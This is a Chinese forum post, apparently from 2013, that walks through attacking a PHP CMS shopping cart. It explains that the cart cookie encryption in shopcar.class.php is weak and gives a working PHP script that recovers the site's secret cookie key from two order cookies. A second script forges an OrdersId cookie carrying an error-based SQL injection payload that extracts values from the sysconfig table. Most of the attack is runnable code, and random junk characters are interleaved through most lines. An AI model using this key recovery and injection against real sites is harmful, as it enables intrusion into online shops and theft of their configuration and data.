www.xxx.com/plus/search.php?keyword=
9 E. o( V$ O* r3 M$ X- w在 include/shopcar.class.php中
; Y5 t$ W/ x0 R: ~0 q# f先看一下这个shopcar类是如何生成cookie的
0 J3 s3 V" |) |3 |( J! ^239 function saveCookie($key,$value)
6 c3 F! y" x) a) `4 ]- A240 {
% ?; } {1 u+ p+ L l241 if(is_array($value))
, z) E9 f7 @+ D( |. A V242 {, u7 M+ f$ s+ N) _) g( g" q6 G
243 $value = $this->enCrypt($this->enCode($value));9 W5 D8 G5 H% g, j# n) X0 Q
244 }
2 J/ ^/ y* _: ]0 f/ M: J0 z* M245 else
* q2 s! N, U# v246 {5 @" h6 }9 s; P( R4 L: W6 H5 e
247 $value = $this->enCrypt($value);
3 u8 E4 Q' n- E$ R+ {248 }
+ i- i3 G+ a7 |' n! H1 a7 [" G249 setcookie($key,$value,time()+36000,’/');
% w" H& q+ K9 e* R& `& e250 }* `& g4 c- @+ n, M
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数( j* D1 M+ z1 x3 v4 f
186 function enCrypt($txt): D* g, Q( r* V" v
187 {
5 Q2 e5 f( p3 Q188 srand((double)microtime() * 1000000);
& r$ t* U/ U6 T3 R& S1 F7 t R189 $encrypt_key = md5(rand(0, 32000));4 a5 t" _% C: R2 k
190 $ctr = 0;! F& k- O( H2 t- a j2 F
191 $tmp = ”;
: S5 x) I9 h2 N192 for($i = 0; $i < strlen($txt); $i++)1 M8 d9 `7 a, g$ B% i1 e
193 {/ ^: d7 ]5 T0 k1 J5 {0 P* x% Z- T
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;4 V! x* s2 m+ {* _7 h4 D( A5 O
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);. ^. A! E" ~2 N: O2 y& y( @9 g0 M
196 }: F. A. M. i. J1 `
197 return base64_encode($this->setKey($tmp));
0 v( s& P- m* U J8 i* x198 }/ K5 Z. ]3 D) j# E
213 function setKey($txt)5 U7 ?- m) M0 R& N& P" ?: }
214 {' L# P* W; E H& Y. X& z9 {
215 global $cfg_cookie_encode;& {4 A, y( \ m# a: `. `% P
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
& I3 N, k: j* s$ H+ H% z5 ]6 r217 $ctr = 0;7 d0 M9 c/ G d- X
218 $tmp = ”;
) f6 [1 p5 @3 a$ @, ~219 for($i = 0; $i < strlen($txt); $i++)
# {. \0 l( S& r2 d220 {
/ V7 C C( n0 R! a6 L& I5 U. z221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ A- i( |" R) b1 N222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
' l. T7 u7 X; ^& s223 }( n0 [2 f& i6 ^: ]5 v( q
224 return $tmp;
2 {( r+ Y% Z+ Y: w- z0 f% d, ~% \- j225 }+ M9 V; [/ L: R5 d9 R! n
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
! y0 `# @0 J3 @) G; n! ~/ m然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。/ E* s, U5 ^6 R
具体代码如下:3 r- u5 m9 G3 e" C- s: k) W4 `9 ]
<?php
- |9 @2 h2 m( j) s/ W$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
7 D) X/ W8 i/ @6 S* T( }, M$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
; ?% v# a# G: D9 ~$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
+ Z3 R# x1 O( z$ [# ] c2 z8 Ofunction reStrCode($code,$string)7 W0 }* ~9 M! t) X6 p' P
{9 ]( J* A9 r: Y% c& a. k- V
$code = base64_decode($code);
6 l$ h3 v8 q' C e+ t V1 U$key = “”;
0 q- m& l" b; j9 t' S4 b; p0 U9 Jfor($i=0 ; $i<32 ; $i++)) u# z. b5 j! v9 ~& r, ] C2 j
{* n: L3 C- Z/ a7 n
$key .= $string[$i] ^ $code[$i];% R8 G. I/ m& C
}
* ?( Q( F, F! [6 e8 M8 Wreturn $key;
* V% p: O4 ]( g6 K}+ l/ V2 R+ Y& p! c2 Y) z
function getKeys($cookie,$plantxt)
6 I/ A# ^" [2 {. r( y, ~{8 h0 Q, r1 ~% V) A# d0 g
$tmp = $cookie;0 l( y# ?& B( O+ ^+ l N3 f& @
$results = array();
6 g0 `) N! }. q* R5 d: c( j+ Vfor($j=0 ; $j < 32000; $j++)
2 x, V4 @% `$ K( @* ~{
/ p& ]0 k9 D; q4 v; m1 B9 C
9 w: B* j; h, q7 }8 {2 y$txt = $plantxt;6 R* l- ~! G% K f& L
$ctr = 0;4 R% h3 b8 T/ z
$tmp = ”;0 J3 |4 T1 V/ Z/ r0 k
$encrypt_key = md5($j);
& B& ?) s! ~5 P; P/ G- h# ufor($i =0; $i < strlen($txt); $i ++)
. e5 u2 t. x h! d, Q6 Q{
# d1 O7 A& ?# i: s5 ~0 B& x, }$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
; T( {6 k$ H8 h7 K# t$ B$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);7 A8 S; W, ]+ k# A- |5 B2 f6 f d
}
) C4 R( g8 p2 v4 V$string = $tmp;
: w/ G" w; z# c* u$code = $cookie;( r& G0 R# D( u! }
$result = reStrCode($code,$string);
9 b1 ?" a) j" Jif(eregi(‘^[a-z0-9]+$’,$result))5 ^1 n! \$ a, _/ W9 B# `
{
; k" t1 g# A$ A9 W/ K" \7 techo $result.”\n”;
" S! u5 l$ ]/ _$results[] = $result;
s" X) T% k: O1 y9 h}
. x* S; J! J7 k& n}
" c6 K$ l5 G0 U' |* r' A$ Jreturn $results;; v! b5 |0 ~$ K- t
}6 e; n3 K+ C, w! k. p1 T
$results1 = getKeys($cookie1,$plantxt);
. z0 S; Y$ s% W* _" W8 m, {$results2 = getKeys($cookie2,$plantxt);
4 f# }7 t2 r, Rprint “\n——————–real key————————–\n”;% k7 H9 i8 r8 i
foreach($results1 as $test1)6 y3 k) o! {( I3 a1 \4 o3 N
{
3 z# O" ^ W5 T# K' cforeach($results2 as $test2)/ C X$ M( z8 w; {) K3 _) T4 O
{0 |8 P# d1 P8 J% z7 j& O
if($test1 == $test2): z5 \2 o7 d: q+ l& N
{
# i1 \. q" q8 u; n! |0 k2 zecho $test1.”\n”;
5 c: u& I K" s5 O9 F+ m: J4 J# y0 t}9 `: X; F1 H9 D4 \' E% B: z4 Q
}: h8 G5 k, j% ~7 a
}% Q: J' E" M8 K- E% ]- X( i
?>! j7 x# w% p& O( k+ l
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
+ m& W+ {1 W& Q2 A1 {% ~4 I( x, uplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1& e7 W& K9 ^) p4 c
然后推算出md5(strtolower($cfg_cookie_encode))
! f* ]% Y- P% \% h0 g) e得到这个key之后,我们就可以构造任意购物车的cookie
7 u; y0 j9 C6 _接着看9 ]9 ~, n+ S$ K; @# p+ I
20 class MemberShops* h* d( _1 F) o
21 {
4 e3 l9 q( V" Q9 P$ Y22 var $OrdersId;' L5 m# q. P# X5 V
23 var $productsId;
9 {2 [ j+ _6 j5 Z' }* q24
$ u# E+ k7 i& G) O$ J; y) I25 function __construct()
6 W4 q/ b$ ]6 h" H O. {2 N26 {' L9 ~/ q' D; {. A) T8 q
27 $this->OrdersId = $this->getCookie(“OrdersId”);: b! l+ h$ M+ ?
28 if(empty($this->OrdersId))' b- T1 {9 b0 e" G- i
29 {
" _0 F9 v D- {; v4 [30 $this->OrdersId = $this->MakeOrders();2 l! `2 g G7 X) i1 `4 [1 K
31 }6 v4 O# w7 G, a# {
32 }% k- k( o b9 ]
发现OrderId是从cookie里面获取的
$ |& u6 S+ Q) r. p/ a然后; @4 v3 w3 S7 i- Y# {' \5 d, _8 X, g
/plus/carbuyaction.php中的
7 ^2 c0 G& z7 N% [0 n29 $cart = new MemberShops();
# v2 F- P& Z0 n3 q5 H$ D39 $OrdersId = $cart->OrdersId; //本次记录的订单号
j" F# O, N& X# a# A! ~……
) Y- D R% A6 U6 t- O6 r173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
6 P* z$ x' a* K接着我们就可以注入了
1 l' a, I& ^3 B1 Q# m$ G$ w3 Z通过利用下面代码生成cookie:
: f! k y3 k4 u9 O U' i) A# ]<?php
* D4 J9 j5 `9 j5 A$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
* I7 X- j3 [- u- Y8 y# a2 H1 g$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
+ \* @" d+ ~) P" G3 E3 p$ T& B' L4 X' Nfunction setKey($txt)
3 p# g8 S, H% r{
- G* v- L& e4 f5 Eglobal $encrypt_key;9 E% m& G# X9 c" H$ {- K2 s
$ctr = 0;4 u9 R, k: B. j4 S2 n
$tmp = ”;
( |2 S; O& X9 X' p4 M" y9 qfor($i = 0; $i < strlen($txt); $i++); I6 l# k* W) t4 l7 [0 l7 j
{
1 ?9 h& O5 g% O$ W d9 v' V$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) ~5 D6 p- w; p0 l) E' P( C1 } J7 J$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];8 J1 i/ \, S, f9 Z( E
}
+ J* G( \7 c1 a# Creturn $tmp;# N/ C G5 p9 _8 m
}. z, A' q/ [$ K' d8 R. F
function enCrypt($txt)6 j6 j' V4 f" e6 s) H( f
{) v2 t. E+ I K8 T
srand((double)microtime() * 1000000);: V1 h7 X9 G3 b1 h
$encrypt_key = md5(rand(0, 32000));8 C4 _6 R+ @& h0 |3 }+ M; }6 E
$ctr = 0;, o5 K' _* O8 q5 I. f7 \9 f, q6 ~5 I
$tmp = ”;! ?$ Q+ S# p% v- i! K/ a
for($i = 0; $i < strlen($txt); $i++)' Q- U Y$ \6 }/ l( a0 k7 T
{; t' m' i0 b. _5 E- o8 Y: W$ H
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;' j0 P8 F0 n- ]
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);' m5 \0 `9 N `+ A4 n' Q- m
}
" l4 g' X9 k' {; r# ^return base64_encode(setKey($tmp));5 e* d& Z- Q$ m# Y
}
& p. l! _5 M/ afor($dest =0;$dest = enCrypt($txt);)* `0 f' {. m6 X' o9 L
{
. h7 B, p# V8 ?( }7 ?% bif(!strpos($dest,’+'))
/ f/ I: S# f! g( X/ f; e. ?{& H6 @. k3 h4 c: K
break;* i- N; j, a' U
}
: I$ s1 p8 S& L9 f# K% Y}
. g$ S7 V; J% \! }9 Necho $dest.”\n”;6 v& Z2 s0 ]4 F
?># T# M* e7 ?4 \4 _8 H7 j
$ w# T( ]% R9 ~- K% | |
发表于 2013-2-13 23:58:29
收藏
支持
反对